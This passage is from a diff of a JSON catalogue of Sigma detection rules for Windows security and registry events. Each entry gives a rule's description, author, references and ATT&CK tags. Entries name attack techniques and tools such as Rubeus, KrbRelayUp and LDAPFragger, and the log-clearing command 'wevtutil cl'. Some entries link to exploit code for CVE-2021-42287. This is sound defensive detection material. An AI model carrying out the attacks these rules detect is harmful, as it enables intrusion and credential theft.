Patzke", - "creation_date": "2019/01/28", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_rdp_localhost_login.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_localhost_login.yml" - ], - 
"tags": [ - "attack.lateral_movement", - "car.2013-07-002", - "attack.t1021.001" - ] - }, - "uuid": "51e33403-2a37-4d66-a574-1fda1782cc31", - "value": "RDP Login from Localhost" - }, - { - "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", - "meta": { - "author": "Samir Bousseaden", - "creation_date": "2019/02/16", - "falsepositive": [ - "Programs that connect locally to the RDP port" - ], - "filename": "win_security_rdp_reverse_tunnel.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/SBousseaden/status/1096148422984384514", - "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/44fbe85f72ee91582876b49678f9a26292a155fb/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_reverse_tunnel.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.lateral_movement", - "attack.t1090.001", - "attack.t1090.002", - "attack.t1021.001", - "car.2013-07-002" - ] - }, - "uuid": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", - "value": "RDP over Reverse SSH Tunnel WFP" - }, - { - "description": "Detects potential use of Rubeus via registered new trusted logon process", - "meta": { - "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_register_new_logon_process_by_rubeus.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_register_new_logon_process_by_rubeus.yml" - ], - "tags": [ - "attack.lateral_movement", - 
"attack.privilege_escalation", - "attack.t1558.003" - ] - }, - "uuid": "12e6d621-194f-4f59-90cc-1959e21e69f7", - "value": "Register new Logon Process by Rubeus" - }, - { - "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g", - "creation_date": "2019/09/12", - "falsepositive": [ - "Legitimate use of remote PowerShell execution" - ], - "filename": "win_security_remote_powershell_session.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_remote_powershell_session.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "13acf386-b8c6-4fe0-9a6e-c4756b974698", - "value": "Remote PowerShell Sessions Network Connections (WinRM)" - }, - { - "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", - "meta": { - "author": "frack113", - "creation_date": "2022/10/14", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_replay_attack_detected.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4649", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_replay_attack_detected.yml" - ], - "tags": "No established tags" - }, - "uuid": "5a44727c-3b85-4713-8c44-4401d5499629", - "value": "Replay Attack Detected" - }, - { - 
"description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/12/22", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://medium.com/@mvelazco/hunting-for-samaccountname-spoofing-cve-2021-42287-and-domain-controller-impersonation-f704513c8a45", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_samaccountname_spoofing_cve_2021_42287.yml" - ], - "tags": "No established tags" - }, - "uuid": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", - "value": "Suspicious Computer Account Name Change CVE-2021-42287" - }, - { - "description": "Detects handles requested to SAM registry hive", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g", - "creation_date": "2019/08/12", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_sam_registry_hive_handle_request.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190725024610.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_sam_registry_hive_handle_request.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1012", - "attack.credential_access", - "attack.t1552.002" - ] - }, - "uuid": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", - "value": "SAM Registry Hive Handle Request" - }, - { - "description": "Detects scheduled task deletion events. Scheduled tasks are likely to be deleted if not used for persistence. Malicious Software often creates tasks directly under the root node e.g. 
\\TASKNAME", - "meta": { - "author": "David Strassegger, Tim Shelton", - "creation_date": "2021/01/22", - "falsepositive": [ - "Software installation" - ], - "filename": "win_security_scheduled_task_deletion.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/matthewdunwoody/status/1352356685982146562", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scheduled_task_deletion.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "car.2013-08-001", - "attack.t1053.005" - ] - }, - "uuid": "4f86b304-3e02-40e3-aa5d-e88a167c9617", - "value": "Scheduled Task Deletion" - }, - { - "description": "Detects non-system users failing to get a handle of the SCM database.", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g", - "creation_date": "2019/08/12", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_scm_database_handle_failure.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190826010110.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scm_database_handle_failure.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1010" - ] - }, - "uuid": "13addce7-47b2-4ca0-a98f-1de964d1d669", - "value": "SCM Database Handle Failure" - }, - { - "description": "Detects non-system users performing privileged operation os the SCM database", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", - "creation_date": "2019/08/15", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_scm_database_privileged_operation.yml", - "level": "medium", - "logsource.category": "No established category", - 
"logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190826010110.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scm_database_privileged_operation.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548" - ] - }, - "uuid": "dae8171c-5ec6-4396-b210-8466585b53e9", - "value": "SCM Database Privileged Operation" - }, - { - "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/09/02", - "falsepositive": [ - "SCCM" - ], - "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-200902020333.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scrcons_remote_wmi_scripteventconsumer.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.003" - ] - }, - "uuid": "9599c180-e3a8-4743-8f92-7fb96d3be648", - "value": "Remote WMI ActiveScriptEventConsumers" - }, - { - "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", - "meta": { - "author": "Tim Rauch", - "creation_date": "2022/09/15", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_service_installation_by_unusal_client.yml", - "level": "high", - "logsource.category": "security", - "logsource.product": "windows", - "refs": [ - "https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html", - "https://twitter.com/SBousseaden/status/1490608838701166596", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_service_installation_by_unusal_client.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1543" - ] - }, - "uuid": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", - "value": "Service Installed By Unusual Client - Security" - }, - { - "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", - "meta": { - "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", - "creation_date": "2020/08/06", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_smb_file_creation_admin_shares.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/OTRF/ThreatHunter-Playbook/blob/f7a58156dbfc9b019f17f638b8c62d22e557d350/playbooks/WIN-201012004336.yaml", - "https://securitydatasets.com/notebooks/small/windows/08_lateral_movement/SDWIN-200806015757.html?highlight=create%20file", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_smb_file_creation_admin_shares.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ] - }, - "uuid": "b210394c-ba12-4f89-9117-44a2464b9511", - "value": "SMB Create Remote File Admin Share" - }, - { - "description": "Addition of domains is seldom and should be verified for legitimacy.", - "meta": { - "author": "Thomas Patzke", - "creation_date": "2019/12/03", - "falsepositive": [ - "Legitimate extension of domain structure" - ], - "filename": "win_security_susp_add_domain_trust.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_add_domain_trust.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ] - }, - "uuid": 
"0255a820-e564-4e40-af2b-6ac61160335c", - "value": "Addition of Domain Trusts" - }, - { - "description": "An attacker can use the SID history attribute to gain additional privileges.", - "meta": { - "author": "Thomas Patzke, @atc_project (improvements)", - "creation_date": "2017/02/19", - "falsepositive": [ - "Migration of an account into a new domain" - ], - "filename": "win_security_susp_add_sid_history.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://adsecurity.org/?p=1772", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_add_sid_history.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1134.005" - ] - }, - "uuid": "2632954e-db1c-49cb-9936-67d1ef1d17d2", - "value": "Addition of SID History to Active Directory Object" - }, - { - "description": "Code integrity failures may indicate tampered executables.", - "meta": { - "author": "Thomas Patzke", - "creation_date": "2019/12/03", - "falsepositive": [ - "Disk device errors" - ], - "filename": "win_security_susp_codeintegrity_check_failure.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_codeintegrity_check_failure.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.001" - ] - }, - "uuid": "470ec5fa-7b4e-4071-b200-4c753100f49b", - "value": "Failed Code Integrity Checks" - }, - { - "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", - "meta": { - "author": "elhoim", - "creation_date": "2022/09/09", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_susp_computer_name.yml", + "filename": "registry_event_stickykey_like_backdoor.yml", "level": "critical", - "logsource.category": "security", + "logsource.category": 
"registry_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/malmoeb/status/1511760068743766026", - "https://github.com/WazeHell/sam-theadmin/blob/main/sam_the_admin.py", - "https://github.com/helloexp/0day/blob/614227a7b9beb0e91e7e2c6a5e532e6f7a8e883c/00-CVE_EXP/CVE-2021-42287/sam-the-admin/sam_the_admin.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_computer_name.yml" - ], - "tags": [ - "cve.2021.42278", - "cve.2021.42287", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1078" - ] - }, - "uuid": "39698b3f-da92-4bc6-bfb5-645a98386e45", - "value": "Win Susp Computer Name Containing Samtheadmin" - }, - { - "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.", - "meta": { - "author": "Thomas Patzke", - "creation_date": "2017/02/19", - "falsepositive": [ - "Initial installation of a domain controller" - ], - "filename": "win_security_susp_dsrm_password_change.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://adsecurity.org/?p=1714", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_dsrm_password_change.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ] - }, - "uuid": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", - "value": "Password Change on Directory Service Restore Mode (DSRM) Account" - }, - { - "description": "One of the Windows Eventlogs has been cleared. e.g. 
caused by \"wevtutil cl\" command execution", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/01/10", - "falsepositive": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" - ], - "filename": "win_security_susp_eventlog_cleared.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/deviouspolack/status/832535435960209408", - "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_eventlog_cleared.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" - ] - }, - "uuid": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", - "value": "Security Eventlog Cleared" - }, - { - "description": "Detects a source user failing to authenticate with multiple users using explicit credentials on a host.", - "meta": { - "author": "Mauricio Velazco", - "creation_date": "2021/06/01", - "falsepositive": [ - "Terminal servers", - "Jump servers", - "Other multiuser systems like Citrix server farms", - "Workstations with frequently changing users" - ], - "filename": "win_security_susp_failed_logons_explicit_credentials.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_explicit_credentials.yml" - ], - "tags": [ - "attack.t1110.003", - "attack.initial_access", - "attack.privilege_escalation" - ] - }, - "uuid": "196a29c2-e378-48d8-ba07-8a9e61f7fab9", - "value": "Multiple Users Attempting To 
Authenticate Using Explicit Credentials" - }, - { - "description": "Detects failed logins with multiple accounts from a single process on the system.", - "meta": { - "author": "Mauricio Velazco", - "creation_date": "2021/06/01", - "falsepositive": [ - "Terminal servers", - "Jump servers", - "Other multiuser systems like Citrix server farms", - "Workstations with frequently changing users" - ], - "filename": "win_security_susp_failed_logons_single_process.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", - "https://www.trimarcsecurity.com/single-post/2018/05/06/trimarc-research-detecting-password-spraying-with-security-event-auditing", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_process.yml" - ], - "tags": [ - "attack.t1110.003", - "attack.initial_access", - "attack.privilege_escalation" - ] - }, - "uuid": "fe563ab6-ded4-4916-b49f-a3a8445fe280", - "value": "Multiple Users Failing to Authenticate from Single Process" - }, - { - "description": "Detects suspicious failed logins with different user accounts from a single source system", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/01/10", - "falsepositive": [ - "Terminal servers", - "Jump servers", - "Other multiuser systems like Citrix server farms", - "Workstations with frequently changing users" - ], - "filename": "win_security_susp_failed_logons_single_source.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1078" - ] - }, - "uuid": 
"e98374a6-e2d9-4076-9b5c-11bdb2569995", - "value": "Failed Logins with Different Accounts from Single Source System" - }, - { - "description": "Detects suspicious failed logins with different user accounts from a single source system", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/01/10", - "falsepositive": [ - "Terminal servers", - "Jump servers", - "Other multiuser systems like Citrix server farms", - "Workstations with frequently changing users" - ], - "filename": "win_security_susp_failed_logons_single_source2.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source2.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1078" - ] - }, - "uuid": "6309ffc4-8fa2-47cf-96b8-a2f72e58e538", - "value": "Failed NTLM Logins with Different Accounts from Single Source System" - }, - { - "description": "Detects multiple failed logins with multiple valid domain accounts from a single source system using the Kerberos protocol.", - "meta": { - "author": "Mauricio Velazco, frack113", - "creation_date": "2021/06/01", - "falsepositive": [ - "Vulnerability scanners", - "Misconfigured systems", - "Remote administration tools", - "VPN terminators", - "Multiuser systems like Citrix server farms" - ], - "filename": "win_security_susp_failed_logons_single_source_kerberos.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_kerberos.yml" - ], - "tags": [ - "attack.t1110.003", - "attack.initial_access", - "attack.privilege_escalation" - ] - }, - 
"uuid": "5d1d946e-32e6-4d9a-a0dc-0ac022c7eb98", - "value": "Valid Users Failing to Authenticate From Single Source Using Kerberos" - }, - { - "description": "Detects failed logins with multiple disabled domain accounts from a single source system using the Kerberos protocol.", - "meta": { - "author": "Mauricio Velazco, frack113", - "creation_date": "2021/06/01", - "falsepositive": [ - "Vulnerability scanners", - "Misconfigured systems", - "Remote administration tools", - "VPN terminators", - "Multiuser systems like Citrix server farms" - ], - "filename": "win_security_susp_failed_logons_single_source_kerberos2.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_kerberos2.yml" - ], - "tags": [ - "attack.t1110.003", - "attack.initial_access", - "attack.privilege_escalation" - ] - }, - "uuid": "4b6fe998-b69c-46d8-901b-13677c9fb663", - "value": "Disabled Users Failing To Authenticate From Source Using Kerberos" - }, - { - "description": "Detects failed logins with multiple invalid domain accounts from a single source system using the Kerberos protocol.", - "meta": { - "author": "Mauricio Velazco, frack113", - "creation_date": "2021/06/01", - "falsepositive": [ - "Vulnerability scanners", - "Misconfigured systems", - "Remote administration tools", - "VPN terminators", - "Multiuser systems like Citrix server farms" - ], - "filename": "win_security_susp_failed_logons_single_source_kerberos3.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_kerberos3.yml" - ], - "tags": [ - "attack.t1110.003", - "attack.initial_access", - "attack.privilege_escalation" - ] - }, - "uuid": "bc93dfe6-8242-411e-a2dd-d16fa0cc8564", - "value": "Invalid Users Failing To Authenticate From Source Using Kerberos" - }, - { - "description": "Detects failed logins with multiple valid domain accounts from a single source system using the NTLM protocol.", - "meta": { - "author": "Mauricio Velazco", - "creation_date": "2021/06/01", - "falsepositive": [ - "Terminal servers", - "Jump servers", - "Other multiuser systems like Citrix server farms", - "Workstations with frequently changing users" - ], - "filename": "win_security_susp_failed_logons_single_source_ntlm.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_ntlm.yml" - ], - "tags": [ - "attack.t1110.003", - "attack.initial_access", - "attack.privilege_escalation" - ] - }, - "uuid": "f88bab7f-b1f4-41bb-bdb1-4b8af35b0470", - "value": "Valid Users Failing to Authenticate from Single Source Using NTLM" - }, - { - "description": "Detects failed logins with multiple invalid domain accounts from a single source system using the NTLM protocol.", - "meta": { - "author": "Mauricio Velazco", - "creation_date": "2021/06/01", - "falsepositive": [ - "Terminal servers", - "Jump servers", - "Other multiuser systems like Citrix server farms", - "Workstations with frequently changing users" - ], - "filename": "win_security_susp_failed_logons_single_source_ntlm2.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - 
"refs": [ - "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_ntlm2.yml" - ], - "tags": [ - "attack.t1110.003", - "attack.initial_access", - "attack.privilege_escalation" - ] - }, - "uuid": "56d62ef8-3462-4890-9859-7b41e541f8d5", - "value": "Invalid Users Failing To Authenticate From Single Source Using NTLM" - }, - { - "description": "This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/02/19", - "falsepositive": [ - "User using a disabled account" - ], - "filename": "win_security_susp_failed_logon_reasons.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625", - "https://twitter.com/SBousseaden/status/1101431884540710913", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logon_reasons.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.initial_access", - "attack.t1078" - ] - }, - "uuid": "9eb99343-d336-4020-a3cd-67f3819e68ee", - "value": "Account Tampering - Suspicious Failed Logon Reasons" - }, - { - "description": "A login from a public IP can indicate a misconfigured firewall or network boundary.", - "meta": { - "author": "NVISO", - "creation_date": "2020/05/06", - "falsepositive": [ - "Legitimate logon attempts over the internet", - "IPv4-to-IPv6 mapped IPs" - ], - "filename": "win_security_susp_failed_logon_source.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - 
"refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logon_source.yml" - ], - "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.t1078", - "attack.t1190", - "attack.t1133" - ] - }, - "uuid": "f88e112a-21aa-44bd-9b01-6ee2a2bbbed1", - "value": "Failed Logon From Public IP" - }, - { - "description": "Detects a source system failing to authenticate against a remote host with multiple users.", - "meta": { - "author": "Mauricio Velazco", - "creation_date": "2021/06/01", - "falsepositive": [ - "Terminal servers", - "Jump servers", - "Other multiuser systems like Citrix server farms", - "Workstations with frequently changing users" - ], - "filename": "win_security_susp_failed_remote_logons_single_source.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_remote_logons_single_source.yml" - ], - "tags": [ - "attack.t1110.003", - "attack.initial_access", - "attack.privilege_escalation" - ] - }, - "uuid": "add2ef8d-dc91-4002-9e7e-f2702369f53a", - "value": "Multiple Users Remotely Failing To Authenticate From Single Source" - }, - { - "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/02/10", - "falsepositive": [ - "Faulty legacy applications" - ], - "filename": "win_security_susp_kerberos_manipulation.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_kerberos_manipulation.yml" - ], - "tags": [ - "attack.credential_access", - 
"attack.t1212" - ] - }, - "uuid": "f7644214-0eb0-4ace-9455-331ec4c09253", - "value": "Kerberos Manipulation" - }, - { - "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like", - "meta": { - "author": "@SBousseaden, Florian Roth", - "creation_date": "2022/04/27", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_susp_krbrelayup.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/sbousseaden/status/1518976397364056071?s=12&t=qKO5eKHvWhAP19a50FTZ7g", - "https://github.com/elastic/detection-rules/blob/fb6ee2c69864ffdfe347bf3b050cb931f53067a6/rules/windows/privilege_escalation_krbrelayup_suspicious_logon.toml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_krbrelayup.yml" + "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", + "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_stickykey_like_backdoor.yml" ], "tags": [ "attack.privilege_escalation", - "attack.credential_access" + "attack.persistence", + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" ] }, - "uuid": "749c9f5e-b353-4b90-a9c1-05243357ca4b", - "value": "KrbRelayUp Attack Pattern" + "uuid": "baca5663-583c-45f9-b5dc-ea96a22ce542", + "value": "Sticky Key Like Backdoor Usage - Registry" }, { - "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", + "description": "DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process 
that loads user32.dll", "meta": { - "author": "xknow @xknow_infosec", - "creation_date": "2019/03/24", - "falsepositive": [ - "Companies, who may use these default LDAP-Attributes for personal information" - ], - "filename": "win_security_susp_ldap_dataexchange.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961", - "https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/", - "https://github.com/fox-it/LDAPFragger", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_ldap_dataexchange.yml" - ], - "tags": [ - "attack.t1001.003", - "attack.command_and_control" - ] - }, - "uuid": "d00a9a72-2c09-4459-ad03-5e0a23351e36", - "value": "Suspicious LDAP-Attributes Used" - }, - { - "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. 
Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", - "meta": { - "author": "James Pemberton / @4A616D6573", - "creation_date": "2019/10/31", + "author": "Ilyas Ochkov, oscd.community, Tim Shelton", + "creation_date": "2019/10/25", "falsepositive": [ "Unknown" ], - "filename": "win_security_susp_local_anon_logon_created.yml", - "level": "high", - "logsource.category": "No established category", + "filename": "registry_event_new_dll_added_to_appinit_dlls_registry_key.yml", + "level": "medium", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/SBousseaden/status/1189469425482829824", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_local_anon_logon_created.yml" + "https://eqllib.readthedocs.io/en/latest/analytics/822dc4c5-b355-4df8-bd37-29c458997b8f.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml" ], "tags": [ "attack.persistence", - "attack.t1136.001", - "attack.t1136.002" + "attack.t1546.010" ] }, - "uuid": "1bbf25b9-8038-4154-a50b-118f2a32be27", - "value": "Suspicious Windows ANONYMOUS LOGON Local Account Created" + "uuid": "4f84b697-c9ed-4420-8ab5-e09af5b2345d", + "value": "New DLL Added to AppInit_DLLs Registry Key" }, { - "description": "Detects suspicious processes logging on with explicit credentials", + "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", "meta": { - "author": 